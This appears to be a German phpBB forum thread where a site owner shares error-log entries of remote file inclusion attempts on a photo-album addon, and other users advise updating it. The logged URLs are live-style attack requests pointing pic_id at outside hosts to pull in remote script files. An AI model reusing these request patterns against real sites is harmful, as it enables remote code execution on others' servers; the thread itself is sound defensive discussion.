Attacke auf smartors Album?

Sicherheit des Webservers, der Server und rund um phpBB
Antworten
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Attacke auf smartors Album?

Beitrag von Holger »

Hallo,

ich habe einen Mod eingebaut, der mir eine Mail zuschickt, sobald das Forum eine Fehlermeldung auswirft.
Dabei habe ich heute diese Fehlermeldung zugeschickt bekommen:
Fel Message:

Bilden existerar ej -> 0


IP: 89.240.190.107
USER: Anonymous
URL: /album_showpage.php?pic_id=http://amyru.h18.ru/images/cs.txt?

FORM:
Array
(
)
Was kann das gewesen sein?

/H
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Da wurde Fremd-Code einzuschleusen.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

+ "versucht"? ^a
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Ups,ja. :!:
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Hm, sind da irgendwelche Löcher bekannt?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

In der neuesten zumindest nicht.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Tja, hehehe
Powered by Photo Album Addon 2.0.51
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Fleissiges Update ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

:x:

Edit: heute ging es weiter.

Code: Alles auswählen

IP: 18.74.7.210
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.005flower.co.kr%2Fitem%2Fvusazam%2Fucuk%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 220.225.22.173
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.filter-international.com%2Flykoon%2Fcimawol%2Fdeqube%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 210.17.247.39
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.asais.info%2Fnewsletter%2Fincludes%2Fjurefim%2Fkom%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 146.164.34.14
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.planet-pictures.de%2Fcontent_system%2Fsehenab%2Fjajox%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 207.250.10.170
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.mflowermall.co.kr%2Fext%2Fwocesa%2Fvicobi%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 217.9.231.214
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.ahappychurch.org%2Fboardgido%2Fvopub%2Fuhi%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 85.200.239.74
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.oriolmanya.net%2Fnautilus%2FphpBB2%2Flanguage%2Flang_english%2Fsaj%2Fbecek%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 221.4.151.150
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.005flower.co.kr%2Fitem%2Fvusazam%2Fucuk%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14

Code: Alles auswählen

IP: 66.46.148.201
USER: Anonymous
URL:
/album_showpage.php?pic_id=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F&sid=d32cff4d4c1798d2603ca1159e9c5c14
Leider lässt sich da keine Einheitliche IP rauslesen, die man blocken könnte ...
Zuletzt geändert von Holger am Do 18.Okt, 2007 10:16, insgesamt 1-mal geändert.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Das wird auch so weiter gehen, da das Album nunmal für die "alte" Schwachstelle bekannt ist.
Album aktualisieren und vergessen...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Naja, sagen wir mal so, das wird auch nach der Aktualisierung weitergehen.
Schaden kann es ja jetzt auch nicht anrichten ...
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Jenau.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Christian_N
Beiträge: 1787
Registriert: Sa 19.Feb, 2005 21:48
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Christian_N »

Vorne weg die album_showpage.php gehört nicht zu des normale Smartor Photo Album, ok die Version die drauf hast sollte schon aktualisiert werde da die ziemlich veralten ist, aber letztendlich wird das album addon "Supercharged Album Pack 1.5.1" angegriffen. Da aber soweit ich weiß keine neue Versionen mehr von diese raus gekommen sind schon seit Jahren, kann man höhste hoffen in drive Foren ggf. Bugfix für des Addon zu finden nur.
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Ich benutze das Clown-Addon.
Es ist mir unmöglich das Album zu aktualisieren, da es keine Step-by-Step-Anleitung gibt.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Oh doch, die gibt es, nur nicht für das Clowns Pack.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Tja, und das ist mein Problem ... Clowns Pack hat nämlich einige Dateien ersetzt ...
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

... die auch heute noch sicher sind ...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Danke! :D
Antworten